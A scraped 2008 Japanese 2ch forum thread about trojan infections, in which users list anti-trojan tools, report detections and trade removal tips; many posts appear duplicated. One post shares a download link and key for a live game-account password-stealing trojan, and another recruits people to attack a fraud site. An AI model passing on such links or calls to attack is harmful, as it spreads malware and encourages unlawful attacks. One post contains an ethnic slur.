☆☆トロイの木馬☆☆5台目
トロイの木馬の現状とそれを取り巻く状況について語るスレです
ネット犯罪の被害者になってしまった方は、まず警察に相談しましょう
【過去スレ】
☆☆トロイの木馬☆☆4台目
http://pc11.2ch.net/test/read.cgi/sec/1171000137/
☆☆トロイの木馬☆☆3台目
http://pc10.2ch.net/test/read.cgi/sec/1132660933/
☆☆トロイの木馬☆☆2台目
http://pc8.2ch.net/test/read.cgi/sec/1087290865/
☆☆トロイの木馬☆☆
http://pc5.2ch.net/test/read.cgi/sec/1052242064/
過去ログ http://troy2ch.s262.xrea.com/
|
|
|
2 :名無しさん@お腹いっぱい。:2008/07/09(水) 11:07:04
スレが途絶えていたので立ててみました
直近の過去ログのテンプレを確認できませんでしたので、
以前に常駐されていた方でテンプレをお持ちの方は
情報の追加ご協力よろしくお願いいたします
直近の過去ログのテンプレを確認できませんでしたので、
以前に常駐されていた方でテンプレをお持ちの方は
情報の追加ご協力よろしくお願いいたします
3 :名無しさん@お腹いっぱい。:2008/07/09(水) 12:21:59
○基本
T用語辞典 e-Words : トロイの木馬 【Trojan Horse】
http://e-words.jp/w/E38388E383ADE382A4E381AEE69CA8E9A6AC.html
スタートアップに関して日本語で詳しく 解説されているページ。
ネットワーク攻撃関連用語集も必見。
http://www.geocities.jp/bruce_teller/security/leakytrojan.htm
○アンチトロイ他セキュリティソフトの情報
Anti-trojan Software Reviews(英語)
http://www.anti-trojan-software-reviews.com/index.htm
wilders.org security advisors(英語)
http://www.wilders.org/index.htm
Rokop Security Foren (独語)
http://www.rokop-security.de/main/index.php
各Firewallのトロイ抑止能力テスト表 (英語)
http://www.firewallleaktester.com/tests.htm
T用語辞典 e-Words : トロイの木馬 【Trojan Horse】
http://e-words.jp/w/E38388E383ADE382A4E381AEE69CA8E9A6AC.html
スタートアップに関して日本語で詳しく 解説されているページ。
ネットワーク攻撃関連用語集も必見。
http://www.geocities.jp/bruce_teller/security/leakytrojan.htm
○アンチトロイ他セキュリティソフトの情報
Anti-trojan Software Reviews(英語)
http://www.anti-trojan-software-reviews.com/index.htm
wilders.org security advisors(英語)
http://www.wilders.org/index.htm
Rokop Security Foren (独語)
http://www.rokop-security.de/main/index.php
各Firewallのトロイ抑止能力テスト表 (英語)
http://www.firewallleaktester.com/tests.htm
4 :名無しさん@お腹いっぱい。:2008/07/09(水) 12:22:40
○アンチトロイソフト
a2(無料版あり。aイって文字化けするのは仕様w)
ttp://www.a-2.org/en/
ewido →AVG Anti-Spyware へ(無料版あり。但し常駐保護機能は有料版じゃないと使えない。9x系不可)
ttp://www.ewido.net/en/?section=products
Tauscan(常駐保護する機能あり)
ttp://www.agnitum.com/products/tauscan/
TDS-3 (無料版あり)
ttp://tds.diamondcs.com.au/
Swat It(フリーソフト)
ttp://swatit.org/index.html
PestPatrol
ttp://www.pestpatrol.jp/
Trojans First Aid Kit 5.01
ttp://www.wilders.org/downloads.htm
TrojanCheck v5.0.4.1 Final
ttp://web.archive.org/web/20030618201938/http://wilders.org/HTMLobj-925/install_trojancheck5041.exe
英語化パッチ
ttp://web.archive.org/web/*/http://www.wilders.org/HTMLobj-833/english.lng
readme.txt
ttp://web.archive.org/web/*/http://www.wilders.org/HTMLobj-834/readme.txt
a2(無料版あり。aイって文字化けするのは仕様w)
ttp://www.a-2.org/en/
ewido →AVG Anti-Spyware へ(無料版あり。但し常駐保護機能は有料版じゃないと使えない。9x系不可)
ttp://www.ewido.net/en/?section=products
Tauscan(常駐保護する機能あり)
ttp://www.agnitum.com/products/tauscan/
TDS-3 (無料版あり)
ttp://tds.diamondcs.com.au/
Swat It(フリーソフト)
ttp://swatit.org/index.html
PestPatrol
ttp://www.pestpatrol.jp/
Trojans First Aid Kit 5.01
ttp://www.wilders.org/downloads.htm
TrojanCheck v5.0.4.1 Final
ttp://web.archive.org/web/20030618201938/http://wilders.org/HTMLobj-925/install_trojancheck5041.exe
英語化パッチ
ttp://web.archive.org/web/*/http://www.wilders.org/HTMLobj-833/english.lng
readme.txt
ttp://web.archive.org/web/*/http://www.wilders.org/HTMLobj-834/readme.txt
5 :名無しさん@お腹いっぱい。:2008/07/09(水) 12:23:11
○システム・モニタリング・ツール
SSM(System Safety Monitor)
ttp://maxcomputing.narod.ru/ssm.html?lang=en
Registry Prot スタートアップを監視するシンプルなソフト
ttp://www.diamondcs.com.au/index.php?page=regprot
○オンライン・チェック
Free online Trojan Scanner
ttp://www.trojanscan.com/
a2 オンライン・チェック
ttp://onlinecheck.emsisoft.com/en/
Firewall Leak Tester
(テストトロイを持ち帰って自分の環境の対トロイ抑止力のレベルを計るのにも利用できる)
ttp://www.firewallleaktester.com/
SSM(System Safety Monitor)
ttp://maxcomputing.narod.ru/ssm.html?lang=en
Registry Prot スタートアップを監視するシンプルなソフト
ttp://www.diamondcs.com.au/index.php?page=regprot
○オンライン・チェック
Free online Trojan Scanner
ttp://www.trojanscan.com/
a2 オンライン・チェック
ttp://onlinecheck.emsisoft.com/en/
Firewall Leak Tester
(テストトロイを持ち帰って自分の環境の対トロイ抑止力のレベルを計るのにも利用できる)
ttp://www.firewallleaktester.com/
6 :名無しさん@お腹いっぱい。:2008/07/09(水) 12:52:03
agent.tkkは本当にトロイですか?
7 :名無しさん@お腹いっぱい。:2008/07/09(水) 13:15:34
因みに上の物はTempフォルダのSvchost.exeで検出しました
8 :名無しさん@お腹いっぱい。:2008/07/09(水) 14:36:41
/ ̄ ̄ ̄ ̄ ̄ ミ
/ ,――――-ミ
/ / / \ |
| / ,(・) (・) |
(6 つ |
| ___ | / ̄ ̄ ̄ ̄ ̄ ̄
| /__/ / < しゃぶれよ!
/| /\ \______
_ -‐ '" ー--、
/ ,.:‐v‐:.、 \
/ ; : / ゙´ ゙i .\
/ ( i lヽ l i
ヽ_ フ ハ ゙.ノ` |
\ !. ./ " ゙'' i. l_!/ \
.>、/ヽ. i ,ィ | | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄l
/ l: ,! ; .; ! |_____________|
/ /, | ; !. i! |l |
\_ ./ | ; ; i! ( ノ |_____________|
゙`ヽ、. ! !l l、 ! ゙i、_| ̄ ̄ ̄ ̄  ̄|
゙ ー--、 | ! ; .| ヽl______________.|
\ ゙ー| !l ;. ! ̄ ゙̄ー" ゙̄ー―‐"、
\ ヽ,! ,: :.. |,,;; ,: \
_/ l . ,. '' \ \ ,; ;゙、ミ゙ \
l .:、 、 \ \ ,;: i;ミ゙;゙ \
L 、 \ \ \./
/ ,――――-ミ
/ / / \ |
| / ,(・) (・) |
(6 つ |
| ___ | / ̄ ̄ ̄ ̄ ̄ ̄
| /__/ / < しゃぶれよ!
/| /\ \______
_ -‐ '" ー--、
/ ,.:‐v‐:.、 \
/ ; : / ゙´ ゙i .\
/ ( i lヽ l i
ヽ_ フ ハ ゙.ノ` |
\ !. ./ " ゙'' i. l_!/ \
.>、/ヽ. i ,ィ | | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄l
/ l: ,! ; .; ! |_____________|
/ /, | ; !. i! |l |
\_ ./ | ; ; i! ( ノ |_____________|
゙`ヽ、. ! !l l、 ! ゙i、_| ̄ ̄ ̄ ̄  ̄|
゙ ー--、 | ! ; .| ヽl______________.|
\ ゙ー| !l ;. ! ̄ ゙̄ー" ゙̄ー―‐"、
\ ヽ,! ,: :.. |,,;; ,: \
_/ l . ,. '' \ \ ,; ;゙、ミ゙ \
l .:、 、 \ \ ,;: i;ミ゙;゙ \
L 、 \ \ \./
9 :名無しさん@お腹いっぱい。:2008/07/09(水) 14:44:13
10 :名無しさん@お腹いっぱい。:2008/07/12(土) 11:56:28
USB知人に貸したら移されたようで
マイコンピュータ→各ドライブを開くとノートン先生の警告画面が出ます。
Trojan.Packed.NsAntiだそうで。
ウイルススキャンさせても反応はなく、
こりゃどうすればいいんでしょうか。
マイコンピュータ→各ドライブを開くとノートン先生の警告画面が出ます。
Trojan.Packed.NsAntiだそうで。
ウイルススキャンさせても反応はなく、
こりゃどうすればいいんでしょうか。
11 :名無しさん@お腹いっぱい。:2008/07/14(月) 06:16:16
窓から放り投げる。
12 :名無しさん@お腹いっぱい。:2008/07/15(火) 23:33:00
TROJ_AGENT.AJVNについて教えてください
13 :名無しさん@お腹いっぱい。:2008/07/16(水) 23:41:04
VBの検索でTROJ_LINEAGE.AWXが引っかかって
感染状況みたら昨日から急激に増えてた。
これにかかった人いる?
感染状況みたら昨日から急激に増えてた。
これにかかった人いる?
14 :名無しさん@お腹いっぱい。:2008/07/16(水) 23:55:51
在日韓国人乙
15 :名無しさん@お腹いっぱい。:2008/07/17(木) 02:54:35
Trojan-Downloader.Win32.Agent.vyy
についてわかる人いますか?
についてわかる人いますか?
16 :名無しさん@お腹いっぱい。:2008/07/17(木) 03:21:02
TROJ_AGENT.AKGN がVBに引っかかる
17 :名無しさん@お腹いっぱい。:2008/07/17(木) 13:40:04
>>16
俺も全く一緒
「手動削除が必要です。詳しくは云々」って出てくるのに、
トレンドマイクロでウイルスDB見ても手動削除の事なんか出てこない
定期的にランダムな名前でexe作られるみたいで、それをVB2008が隔離したりしてるだけ
感染元はどっかに居る
気持ち悪い
俺も全く一緒
「手動削除が必要です。詳しくは云々」って出てくるのに、
トレンドマイクロでウイルスDB見ても手動削除の事なんか出てこない
定期的にランダムな名前でexe作られるみたいで、それをVB2008が隔離したりしてるだけ
感染元はどっかに居る
気持ち悪い
18 :名無しさん@お腹いっぱい。:2008/07/17(木) 18:54:20
19 :名無しさん@お腹いっぱい。:2008/07/17(木) 19:44:45
ttp://gigazine.jp/img/2008/07/16/beijing_stormworm/olympics3.jpg
俺は先週↑をうっかりもらってから調子悪くなったんだが
俺は先週↑をうっかりもらってから調子悪くなったんだが
20 :名無しさん@お腹いっぱい。:2008/07/17(木) 20:54:33
おお 似たような奴がいたんだな
ググってもでてこねぇウイルス名だったし困ったな
とりあえずtemp消してみるか
ググってもでてこねぇウイルス名だったし困ったな
とりあえずtemp消してみるか
21 :名無しさん@お腹いっぱい。:2008/07/17(木) 21:03:17
つーか yourfilehost見たろ?
あっこから入ってるっぽいぞ
あっこから入ってるっぽいぞ
22 :名無しさん@お腹いっぱい。:2008/07/18(金) 00:40:29
ウイルスバスター2008で検索時に毎回トロイの木馬が出てスパイウェアを削除してるんだけど
何回も何回も再生しやがる
なんてこったい
何回も何回も再生しやがる
なんてこったい
23 :名無しさん@お腹いっぱい。:2008/07/18(金) 01:57:14
24 :名無しさん@お腹いっぱい。:2008/07/18(金) 02:53:16
25 :名無しさん@お腹いっぱい。:2008/07/18(金) 03:22:34 BE:922530375-2BP(850)
>>23
vbは何にもしてくれなかったから
カスペルスキーで駆除してもらったよ
ttp://www.just-kaspersky.jp/security/onlscan.html
バスターやくだたねーなぁ
vbは何にもしてくれなかったから
カスペルスキーで駆除してもらったよ
ttp://www.just-kaspersky.jp/security/onlscan.html
バスターやくだたねーなぁ
26 :名無しさん@お腹いっぱい。:2008/07/18(金) 06:28:45
TROJ_AGENT.AKGN
これに引っかかったらどうすりゃいいんだ・・・
これに引っかかったらどうすりゃいいんだ・・・
27 :名無しさん@お腹いっぱい。:2008/07/18(金) 07:37:31
28 :名無しさん@お腹いっぱい。:2008/07/18(金) 15:19:54
>>25
あり!今スキャン中だけど、VBで発見してくれなかったウイルスも見つけてくれてるwwww
期限も近いし乗り換えるか…
正直VBとノートンとカスペならどれがいいんだろう…
まぁ今回の件もあるしカスペなんだろうか
あり!今スキャン中だけど、VBで発見してくれなかったウイルスも見つけてくれてるwwww
期限も近いし乗り換えるか…
正直VBとノートンとカスペならどれがいいんだろう…
まぁ今回の件もあるしカスペなんだろうか
29 :名無しさん@お腹いっぱい。:2008/07/18(金) 18:27:41
最近のカスペも糞だぞ。
AntiVirがお勧め。
AntiVirがお勧め。
30 :名無しさん@お腹いっぱい。:2008/07/18(金) 19:01:05
俺もTROJ_AGENT.AKGNにやられてた。
VBでは隔離できませんって出たからカスペルスキーのオンラインスキャンで場所を特定。
system32の中にあった当該ファイルを手動削除。
すごい疲れたよ……
VBでは隔離できませんって出たからカスペルスキーのオンラインスキャンで場所を特定。
system32の中にあった当該ファイルを手動削除。
すごい疲れたよ……
31 :名無しさん@お腹いっぱい。:2008/07/18(金) 19:49:18
俺もTROJ_AGENT.AKGNやられた
yourfilehostっぽいね…オナニーライフオワタかもしれんね
yourfilehostっぽいね…オナニーライフオワタかもしれんね
32 :名無しさん@お腹いっぱい。:2008/07/18(金) 20:06:14
手動削除ってゴミ箱にいれて空にするだけでいいのかな
とりあえず再スキャンで引っかからなかったけど
とりあえず再スキャンで引っかからなかったけど
33 :名無しさん@お腹いっぱい。:2008/07/18(金) 22:33:25
TROJ_AGENT.AKGNでググってたら、たどり着いた。
警告出すばっかりで検出も駆除もしてくれないんでどうしようかと思ってたわ。
警告出すばっかりで検出も駆除もしてくれないんでどうしようかと思ってたわ。
34 :名無しさん@お腹いっぱい。:2008/07/19(土) 01:30:53
TROJ_AGENT.AKGNとかいうトロイが一日に何度も見つかるんだけどやばいの?
トレンドマイクロのページ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_AGENT.AKGN
トレンドマイクロのページ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_AGENT.AKGN
35 :名無しさん@お腹いっぱい。:2008/07/19(土) 04:32:00
troj_agent.akgn これここ3、4日で出回ってるの? SのROMサイトから貰ったかも…
36 :名無しさん@お腹いっぱい。:2008/07/19(土) 13:02:41
TROJ_CABAT.AB
てのにかかってしまったんですけどどうすれば・・・
てのにかかってしまったんですけどどうすれば・・・
37 :名無しさん@お腹いっぱい。:2008/07/19(土) 13:53:02
とりあえずTROJ_AGENT.AKGNに感染したら
C:\WINDOWS\system32\7jd7lYhy.exe
を削除しとけってか
7jd7lYhy.exe.a_aってのも見つかったけどこれも削除しとくの?
38 :名無しさん@お腹いっぱい。:2008/07/19(土) 14:27:56
ランダム名で自動生成してそうだから、怪しいファイル名が一定とは限らないぞ。
39 :名無しさん@お腹いっぱい。:2008/07/19(土) 14:33:48
40 :名無しさん@お腹いっぱい。:2008/07/19(土) 15:16:57
TROJ_AGENT.AKGNがきちまった・・・
yourfilehostかよ・・・
バスター役に立たないからとりあえずカスペルスキーやってみるわ
yourfilehostかよ・・・
バスター役に立たないからとりあえずカスペルスキーやってみるわ
41 :名無しさん@お腹いっぱい。:2008/07/19(土) 16:30:08
AVG最強
何の反応もないってことは感染してないんだなうん
何の反応もないってことは感染してないんだなうん
42 :名無しさん@お腹いっぱい。:2008/07/19(土) 18:00:28
ヾヾキ≧}}州kh、}从从))}ノノ}
≧}}}トトト、}i州州州ハ///ソソ} ノ
フ≧、}}}ii州川州州ハソソソ彡ソ≠=-
彡彡ツ"´""゙"゙;.;;ilハ}}ソハヾ州三下
彡彡 ゙ミミト
彡i} ミミ
彡ソ ‐- _ ミミ
hli' ,z==z;,._ `;´ 、___,.... ミミ
| }! _ 、 , ´"""゙ リ' >>41 おい!
U '´ ゆ > } : ィ''ゆ`> |
/:.:.::l `ー ´ ; . ` - ' !:.ヘ
. /:.::.:..::l ,: . ,':..:..:ハ
/::.:.: .:..∧ ,. ( 、 _ ,. ) 、. /:.:. :..:.:}
../:.:. ::.:.:.ヽ∧ : : /::.:.::.:.:..:!
:.: ::.:.: ::..:ヽ:.:.:.、ヽ `ー ‐ - ‐-' /:.: :::..i.:.:.{
:.:. :::.: ::.:.:.: \:..:.、\ `⌒´ ,. ´|:.::..::.: :l::.:リ
:.::.:::.:.:.: :.:.:.:.:::.\:.:.、 ` ‐---‐ ' !:.:. ::.:::}::/
≧}}}トトト、}i州州州ハ///ソソ} ノ
フ≧、}}}ii州川州州ハソソソ彡ソ≠=-
彡彡ツ"´""゙"゙;.;;ilハ}}ソハヾ州三下
彡彡 ゙ミミト
彡i} ミミ
彡ソ ‐- _ ミミ
hli' ,z==z;,._ `;´ 、___,.... ミミ
| }! _ 、 , ´"""゙ リ' >>41 おい!
U '´ ゆ > } : ィ''ゆ`> |
/:.:.::l `ー ´ ; . ` - ' !:.ヘ
. /:.::.:..::l ,: . ,':..:..:ハ
/::.:.: .:..∧ ,. ( 、 _ ,. ) 、. /:.:. :..:.:}
../:.:. ::.:.:.ヽ∧ : : /::.:.::.:.:..:!
:.: ::.:.: ::..:ヽ:.:.:.、ヽ `ー ‐ - ‐-' /:.: :::..i.:.:.{
:.:. :::.: ::.:.:.: \:..:.、\ `⌒´ ,. ´|:.::..::.: :l::.:リ
:.::.:::.:.:.: :.:.:.:.:::.\:.:.、 ` ‐---‐ ' !:.:. ::.:::}::/
43 :名無しさん@お腹いっぱい。:2008/07/19(土) 18:42:13
TROJ_CABAT.AB
っていうウィルスにかかったんですけど・・・対処法を教えてください
かかったファイルはすべて削除してしまったんですが・・・
っていうウィルスにかかったんですけど・・・対処法を教えてください
かかったファイルはすべて削除してしまったんですが・・・
44 :名無しさん@お腹いっぱい。:2008/07/19(土) 19:54:08
TROJ_AGENT.AKGNはやっかいだな
怪しいexe消してもランダム名でまた復活してくる
怪しいexe消してもランダム名でまた復活してくる
45 :名無しさん@お腹いっぱい。:2008/07/19(土) 21:50:21
46 :名無しさん@お腹いっぱい。:2008/07/20(日) 00:57:59
Win32.TROJ.AGENT.pm.25856ってウイルス検出したんだがググってもまったく情報ないんだが
誰か分かりませんか?
ウィルスソフトで検知してなんか削除できずに隔離になってしまったんですが
誰か分かりませんか?
ウィルスソフトで検知してなんか削除できずに隔離になってしまったんですが
47 :名無しさん@お腹いっぱい。:2008/07/20(日) 02:41:29
話題のTROJ_AGENT.AKGNの警告が出たのでカスペルキー使ってみました。
って、今またVBの警告でた・・・
【結果】
・system32に[4v36t0XK.exe]と[4v36t0XK.exe.a_a]
・VBの隔離フォルダ内の[E.tmp(aNKBl8Va.exe)]と今出てきた[3F8D.temp(1W8261Ob.exe)]
(2時間おきに警告でる?)
以上報告まで。
って、今またVBの警告でた・・・
【結果】
・system32に[4v36t0XK.exe]と[4v36t0XK.exe.a_a]
・VBの隔離フォルダ内の[E.tmp(aNKBl8Va.exe)]と今出てきた[3F8D.temp(1W8261Ob.exe)]
(2時間おきに警告でる?)
以上報告まで。
48 :名無しさん@お腹いっぱい。:2008/07/20(日) 04:23:59
こりゃVBが対応しない限り個人じゃ駆除できないな
49 :名無しさん@お腹いっぱい。:2008/07/20(日) 08:23:57
TROJ_AGENT.AKGN
カスペルスキーで出てきたexe消して、セーフモードでtempフォルダの中消したら
VBの警告はでなくなったけど、これ消えてんだろか・・心配(´・ω・)
カスペルスキーで出てきたexe消して、セーフモードでtempフォルダの中消したら
VBの警告はでなくなったけど、これ消えてんだろか・・心配(´・ω・)
50 :名無しさん@お腹いっぱい。:2008/07/20(日) 12:39:32
おぉー、トロイ祭りやってるー
51 :名無しさん@お腹いっぱい。:2008/07/20(日) 15:56:35
怖いから携帯からスマン
えろつべ見てたら話題のに感染したらしい…
とりあえずバックアップとってリカバリしたorz
今の所VBの反応なし…なんだが大丈夫だよな?
情報の流出とかないよな…
えろつべ見てたら話題のに感染したらしい…
とりあえずバックアップとってリカバリしたorz
今の所VBの反応なし…なんだが大丈夫だよな?
情報の流出とかないよな…
52 :名無しさん@お腹いっぱい。:2008/07/20(日) 16:50:13
情報の流出が怖いとか会社の人間かよ
53 :名無しさん@お腹いっぱい。:2008/07/20(日) 18:05:31
カスペのオンラインスキャンじゃなくてお試し版使ったら消せたぞ?
VBはアンインストールしなくちゃだめだが
VBはアンインストールしなくちゃだめだが
54 :名無しさん@お腹いっぱい。:2008/07/20(日) 18:42:11
手動で消せよ。
お試し版のためにVB消すとかw
お試し版のためにVB消すとかw
55 :名無しさん@お腹いっぱい。:2008/07/20(日) 23:25:20
17日にTROJ_AGENT.AKGNに感染して17,18,19と
バスターがうるさかったんだが今日になって突然静かになった。
もしかして消えたのかな・・・?
勝手に消えるウィルスってあるのか・・・
バスターがうるさかったんだが今日になって突然静かになった。
もしかして消えたのかな・・・?
勝手に消えるウィルスってあるのか・・・
56 :名無しさん@お腹いっぱい。:2008/07/21(月) 02:35:44
57 :名無しさん@お腹いっぱい。:2008/07/21(月) 05:35:16
てか、ここで騒いでるのVB使いばっかじゃないか?
VBなんてさっさと捨てるが吉
VBに固執するなんて「ばっかじゃなかろーか ルンバ♪」
VBなんてさっさと捨てるが吉
VBに固執するなんて「ばっかじゃなかろーか ルンバ♪」
58 :名無しさん@お腹いっぱい。:2008/07/21(月) 09:58:10
>>55
俺もだ、嵐の前の静けさみたいで怖いわ
俺もだ、嵐の前の静けさみたいで怖いわ
59 :名無しさん@お腹いっぱい。:2008/07/22(火) 08:31:02
警告でなくなったのは俺だけか?
60 :名無しさん@お腹いっぱい。:2008/07/22(火) 10:03:40
感染してしまった・・・orz
TrojanDropper.VB.NAIというものらしいが色んなウィルス情報見たけど載ってねー・・・。
感染した瞬間に2つは削除されたがまだ5つ残ってる。
とりあえず検査してるがもうね・・・
TrojanDropper.VB.NAIというものらしいが色んなウィルス情報見たけど載ってねー・・・。
感染した瞬間に2つは削除されたがまだ5つ残ってる。
とりあえず検査してるがもうね・・・
61 :名無しさん@お腹いっぱい。:2008/07/22(火) 17:02:11
TROJ_CABAT.AB に先日かかって、VBで削除できずに隔離したってメッセージ出てたんで、その隔離先を探したが、そのときにはもうウィルスファイルが無かった。
改めてスキャンしたけどやっぱりウィルスファイルないけど、勝手にウィルス消えたりするの?
改めてスキャンしたけどやっぱりウィルスファイルないけど、勝手にウィルス消えたりするの?
62 :名無しさん@お腹いっぱい。:2008/07/22(火) 20:46:14
spy botのスキャン中に
警告
include ファイルに問題があります
\Program Files\Spybot - Search _ Destroy\Includes\Trojans.sbi
\Program Files\Spybot - Search _ Destroy\Includes\TrojansC.sbi
詳細は 'Include errors.log'を確認してください。
って出るんですが、どうしたらいいですか?
警告
include ファイルに問題があります
\Program Files\Spybot - Search _ Destroy\Includes\Trojans.sbi
\Program Files\Spybot - Search _ Destroy\Includes\TrojansC.sbi
詳細は 'Include errors.log'を確認してください。
って出るんですが、どうしたらいいですか?
63 :名無しさん@お腹いっぱい。:2008/07/22(火) 20:53:33
TROJ_AGENT.AKGNは収束したのか?
64 :名無しさん@お腹いっぱい。:2008/07/23(水) 00:48:09
Trojan.genericに感染しちゃった
65 :名無しさん@お腹いっぱい。:2008/07/24(木) 06:20:28
>>63
ここ数日何も起きないな
ここ数日何も起きないな
66 :名無しさん@お腹いっぱい。:2008/07/25(金) 05:43:44
例の動画サイトから多く出回ってた感じしたから、駆除したんじゃないか?よくわからんがwww
67 :名無しさん@お腹いっぱい。:2008/07/25(金) 15:40:17
Trojan-GameThief.Win32.OnLineGames.sded
というマルウェアが system32ディレクトリに置いてあったんですが
欲しい人います?どこから来たんだろうか・・・ちょっと怖いなあ
感染していたのはこれだけなんですが。バイナリエディタで中を見てみたらLineageって・・・・
OnLineGameはやってないです。Baniasのnoteですから。
ttp://uproda11.2ch-library.com/src/11105250_EBVI/k11105250.rar
DLキー:12345
cidbwsdrv.rarのcidbwsdrv.dllがそれです。ご鑑定のほどをよろしくおねがいします。
属性もそのままにしてありますのでお気をつけください。(RHS)
68 :名無しさん@お腹いっぱい。:2008/07/25(金) 17:19:55
>>67俺も同じのが検出された
トロイなんて初めてだからどうしていいか分からん・・・助けてくれ
トロイなんて初めてだからどうしていいか分からん・・・助けてくれ
69 :名無しさん@お腹いっぱい。:2008/07/25(金) 17:37:12
>>62について誰か教えてください・・・
マルチしてもいいですか?
マルチしてもいいですか?
70 :名無しさん@お腹いっぱい。:2008/07/25(金) 20:09:50
>>67-68
明らかにリネージュ2の中華謹製パス抜きトロイだよ。
ttp://www.virustotal.com/analisis/c8370dc219d13c5e366bfd072a200c83
どこで踏んだんだか。
>>69
Spybotスレで聞いたほうがいいんじゃね?
明らかにリネージュ2の中華謹製パス抜きトロイだよ。
ttp://www.virustotal.com/analisis/c8370dc219d13c5e366bfd072a200c83
どこで踏んだんだか。
>>69
Spybotスレで聞いたほうがいいんじゃね?
71 :名無しさん@お腹いっぱい。:2008/07/25(金) 21:11:22
72 :名無しさん@お腹いっぱい。:2008/07/25(金) 22:25:14
>>67
俺もこの前OnLineGameのトロイ発見された
たぶんネットカフェで使ったUSBメモリが感染源だと思う
OnLineGameはやらないからパス抜かれないしAVGで隔離しただけで放置してるが問題あるのかな
俺もこの前OnLineGameのトロイ発見された
たぶんネットカフェで使ったUSBメモリが感染源だと思う
OnLineGameはやらないからパス抜かれないしAVGで隔離しただけで放置してるが問題あるのかな
73 :名無しさん@お腹いっぱい。:2008/07/25(金) 23:15:29
俺も、VBでトロイがヒットするんだが。
リカバリした方がいいのかな?
リカバリした方がいいのかな?
>>70
レスありがとうございます。IEを通じて実行されてしまったようです。
HijackThisで確認したところ、cidbwsdrv.dllはBHO(Browser Helper Object)には
登録されていませんでした。アウトバンドも全て監視するように変更しましたが今のところ
怪しい通信はありません。
レスありがとうございます。IEを通じて実行されてしまったようです。
HijackThisで確認したところ、cidbwsdrv.dllはBHO(Browser Helper Object)には
登録されていませんでした。アウトバンドも全て監視するように変更しましたが今のところ
怪しい通信はありません。
75 :名無しさん@お腹いっぱい。:2008/07/26(土) 14:33:20
7/25 ttp://www.virustotal.com/analisis/c8370dc219d13c5e366bfd072a200c83
7/25 ttp://www.virustotal.com/analisis/41920f7f7125d3de19547ddccb8aaa8f
トレンドマイクロが最新定義で対応したようですね。Lineageの垢ハック
7/25 ttp://www.virustotal.com/analisis/41920f7f7125d3de19547ddccb8aaa8f
トレンドマイクロが最新定義で対応したようですね。Lineageの垢ハック
76 :名無しさん@お腹いっぱい。:2008/07/27(日) 23:53:34
友人のフラッシュメモリをPCに挿したらトロイが出て削除したんですが、
フラッシュメモリ内のトロイは残ってるんですか?
フラッシュメモリ内のトロイは残ってるんですか?
77 :名無しさん@お腹いっぱい。:2008/07/28(月) 10:20:12
>>76
友人を刑事告訴したほうが良いのでは?
友人を刑事告訴したほうが良いのでは?
78 :名無しさん@お腹いっぱい。:2008/07/28(月) 16:26:02
79 :名無しさん@お腹いっぱい。:2008/08/04(月) 19:59:59
共有されてた英語の音声読み上げソフトをインストールしたら
壊れてるのか悪意をもった人が何かを仕込んだのか不明なんだけど、
エラーばかりでて全然つかえない。
変だなーと思って掲示板をみたらみんな「つかえねーぞ」
「エラーばかりでる」「トロイかウィルスかもしれない」
って言ってる。英語なんでよくわからないけど。
やっちゃった…て感じですが、とりあえずこういう時は、
まずは何をするべきですか?
いまさら慌ててウィルスソフト入れても無駄だよね…?
壊れてるのか悪意をもった人が何かを仕込んだのか不明なんだけど、
エラーばかりでて全然つかえない。
変だなーと思って掲示板をみたらみんな「つかえねーぞ」
「エラーばかりでる」「トロイかウィルスかもしれない」
って言ってる。英語なんでよくわからないけど。
やっちゃった…て感じですが、とりあえずこういう時は、
まずは何をするべきですか?
いまさら慌ててウィルスソフト入れても無駄だよね…?
80 :名無しさん@お腹いっぱい。:2008/08/04(月) 20:13:26
クリーンインストール
81 :名無しさん@お腹いっぱい。:2008/08/05(火) 12:19:34
オーバーホール(w
82 :名無しさん@お腹いっぱい。:2008/08/05(火) 12:44:06
これが2ちゃんクオリティ
83 :名無しさん@お腹いっぱい。:2008/08/05(火) 22:43:17
【田代アパ祭り】ワンクリ詐欺サイト突撃祭り【第二次】
http://yutori.2ch.net/test/read.cgi/news4vip/1217934438/l50
// 1 . {. . .ヽ. . ヽ. . ',. .ヽヽ
/ .:/ ハ: :!: :.:ト、:.:. :\:...l:.. :}: : |_⊥ 、
j . {: .:{ :l、:l、: :.ト-ヽ、_:..`ヽ、j__イ_つノ
l 1:ハ.::{ゝl=くヽ:.ヽ トィjr}Tァ┬ァ:.:´|
|ハ :ヽlァ{トィrj \i ー_'っ /:.イ-、:。:| 詐欺サイトに攻撃中ですが
ヽ。ハ^rぅ' 丶 ` ノ', く } }:.ol゚ o人が少なすぎて苦戦しています
。 `ハ 。 {ァ´ヽ ,ー o':.へl みなさまの中に凸してもいいという人は
゚ ´ノi\ ー' ィ:;:.ィ/|/゚ 。 いらっしゃいませんか??
。 o 。 ゚ハヘ;:>ー--<_rv〈、_
/ ̄ヽ \/ll }l}`'^'ト、
/ ::Y77l j l !_`7
l, ---::、〉 jl l ハゝ-i
ヽ Vi } ,' ノ, ー_ヽ
} , -‐ァl ノ / レ´,.- j
j イ !l / / ハ -,.く!
http://yutori.2ch.net/test/read.cgi/news4vip/1217934438/l50
// 1 . {. . .ヽ. . ヽ. . ',. .ヽヽ
/ .:/ ハ: :!: :.:ト、:.:. :\:...l:.. :}: : |_⊥ 、
j . {: .:{ :l、:l、: :.ト-ヽ、_:..`ヽ、j__イ_つノ
l 1:ハ.::{ゝl=くヽ:.ヽ トィjr}Tァ┬ァ:.:´|
|ハ :ヽlァ{トィrj \i ー_'っ /:.イ-、:。:| 詐欺サイトに攻撃中ですが
ヽ。ハ^rぅ' 丶 ` ノ', く } }:.ol゚ o人が少なすぎて苦戦しています
。 `ハ 。 {ァ´ヽ ,ー o':.へl みなさまの中に凸してもいいという人は
゚ ´ノi\ ー' ィ:;:.ィ/|/゚ 。 いらっしゃいませんか??
。 o 。 ゚ハヘ;:>ー--<_rv〈、_
/ ̄ヽ \/ll }l}`'^'ト、
/ ::Y77l j l !_`7
l, ---::、〉 jl l ハゝ-i
ヽ Vi } ,' ノ, ー_ヽ
} , -‐ァl ノ / レ´,.- j
j イ !l / / ハ -,.く!
84 :名無しさん@お腹いっぱい。:2008/08/10(日) 20:05:22
zipをウィルススキャンしただけで感染したみたいなんだけど
こんなことってありえるの?
こんなことってありえるの?
85 :名無しさん@お腹いっぱい。:2008/08/12(火) 19:20:14
